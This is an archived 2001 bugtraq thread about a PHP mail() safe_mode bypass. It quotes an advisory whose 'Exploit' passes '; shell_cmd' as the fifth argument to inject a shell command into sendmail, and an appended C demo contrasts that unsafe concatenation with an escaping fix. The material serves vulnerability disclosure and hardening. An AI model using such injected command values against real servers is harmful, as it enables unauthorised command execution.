[21651] in bugtraq
Re: php mail function bypass safe_mode restriction
daemon@ATHENA.MIT.EDU (Stuart Moore)
Thu Jul 19 13:00:34 2001
Message-ID: <3B567368.233FE64@securitytracker.com>
Date: Thu, 19 Jul 2001 01:43:04 -0400
From: Stuart Moore <info@securitytracker.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, sintes@nfrance.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi. I might be having a case of deja vu, because this problem sounds
familiar. Is this problem different from the one posted by Joost Pol
<joost@contempt.nl> on Sat Jun 30 2001 12:40:06 ("php breaks safe
mode")? In that one, a problem with an extra 5th parameter that was
added to the mail() command and broke safe mode was described, affecting
4.0.5.
See: http://www.securityfocus.com/bid/2954
Also, from January 2000 there was a report of a problem in PHP 3 where
the popen() command, used by mail(), fails to be applied to the
EscapeShellCmd() command.
See: http://www.securityfocus.com/bid/911
So, is the problem w/ popen() or with mail()?
Stuart
----------------------------
Stuart Moore
SecurityTracker.com
SecurityGlobal.net LLC
smoore @ securityglobal.net
----------------------------
-----------------------------------------------------------------
The php mail() function does not check for escaped shell commands,
even if php is running in safe_mode.
So it may be possible to bypass the safe_mode restriction and gain
shell access.
Affected:
php4.0.6
php4.0.5
Significant lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("toto@toto.com",
"test",
"test",
"test",
"; shell_cmd");
-----------------------------------------------------------------
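The three quoted lines from ext/standard/mail.c are the whole bug: the fifth argument is appended to the sendmail command string with strcat() and the result is handed to popen(), i.e. to /bin/sh, so any shell metacharacter in that argument becomes a command. The following is an added illustration written for this archive page, not code from the original advisory, from Stuart's reply, or from PHP itself: it reproduces the unsafe concatenation next to a hardened builder that refuses metacharacters under safe_mode and backslash-escapes them otherwise. The sendmail path and flags, the metacharacter set (modelled on escapeshellcmd()'s, but not copied from it) and the buffer sizes are assumptions for the demo.

```c
/* Added demo of the mail() extra-parameter injection: the quoted
 * strcat()/popen() pattern beside a hardened form. Not PHP source code.
 * SENDMAIL_PATH, the metacharacter set and buffer sizes are assumed. */
#include <stdio.h>
#include <string.h>

#define SENDMAIL_PATH "/usr/sbin/sendmail -t -i"   /* assumed default */

/* Characters that /bin/sh treats specially. The set is an assumption
 * roughly following escapeshellcmd(); NUL is excluded explicitly below
 * because strchr() would otherwise match the string terminator. */
static const char SHELL_META[] = "#&;`|*?~<>^()[]{}$\\\n";

static int is_shell_meta(unsigned char c)
{
    return c != '\0' && strchr(SHELL_META, c) != NULL;
}

/* 1 if extra_cmd contains anything the shell would interpret. */
int contains_shell_meta(const char *extra_cmd)
{
    for (; *extra_cmd; extra_cmd++)
        if (is_shell_meta((unsigned char)*extra_cmd))
            return 1;
    return 0;
}

/* Mirrors the quoted mail.c behaviour: extra_cmd is appended verbatim to
 * the sendmail command line that popen() will pass to the shell. snprintf
 * replaces the original strcat() only to keep the demo bounds-safe; the
 * resulting string is identical. Returns 0, or -1 if it does not fit. */
int build_sendmail_cmd_unsafe(const char *extra_cmd, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s %s", SENDMAIL_PATH, extra_cmd);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Backslash-escape every metacharacter so the shell sees it literally.
 * Returns 0, or -1 if the escaped form does not fit in out. */
int escape_shell_cmd(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (; *in; in++) {
        if (is_shell_meta((unsigned char)*in)) {
            if (o + 1 >= outlen) return -1;
            out[o++] = '\\';
        }
        if (o + 1 >= outlen) return -1;
        out[o++] = *in;
    }
    out[o] = '\0';
    return 0;
}

/* Hardened builder. Under safe_mode an argument carrying metacharacters is
 * rejected outright (returns -1); otherwise it is escaped before being
 * appended, so "; shell_cmd" can no longer terminate the sendmail command. */
int build_sendmail_cmd_safe(int safe_mode, const char *extra_cmd,
                            char *out, size_t outlen)
{
    char escaped[512];
    int n;

    if (safe_mode && contains_shell_meta(extra_cmd))
        return -1;
    if (escape_shell_cmd(extra_cmd, escaped, sizeof escaped) != 0)
        return -1;
    n = snprintf(out, outlen, "%s %s", SENDMAIL_PATH, escaped);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    /* Constructed sample inputs: the payload from the advisory, and a
     * legitimate envelope-sender flag. */
    const char *payload = "; shell_cmd";
    const char *benign  = "-fbounce@example.com";
    char cmd[1024];

    build_sendmail_cmd_unsafe(payload, cmd, sizeof cmd);
    printf("unsafe : %s\n", cmd);
    if (build_sendmail_cmd_safe(1, payload, cmd, sizeof cmd) != 0)
        printf("safe   : rejected under safe_mode\n");
    build_sendmail_cmd_safe(0, payload, cmd, sizeof cmd);
    printf("escaped: %s\n", cmd);
    build_sendmail_cmd_safe(1, benign, cmd, sizeof cmd);
    printf("benign : %s\n", cmd);
    return 0;
}
```

Escaping keeps the demo close to the code quoted above, but the stronger fix for this class of bug is to stop using popen() for sendmail altogether: fork/exec it with an argv array, which involves no shell and so leaves nothing for ";" or "|" to terminate.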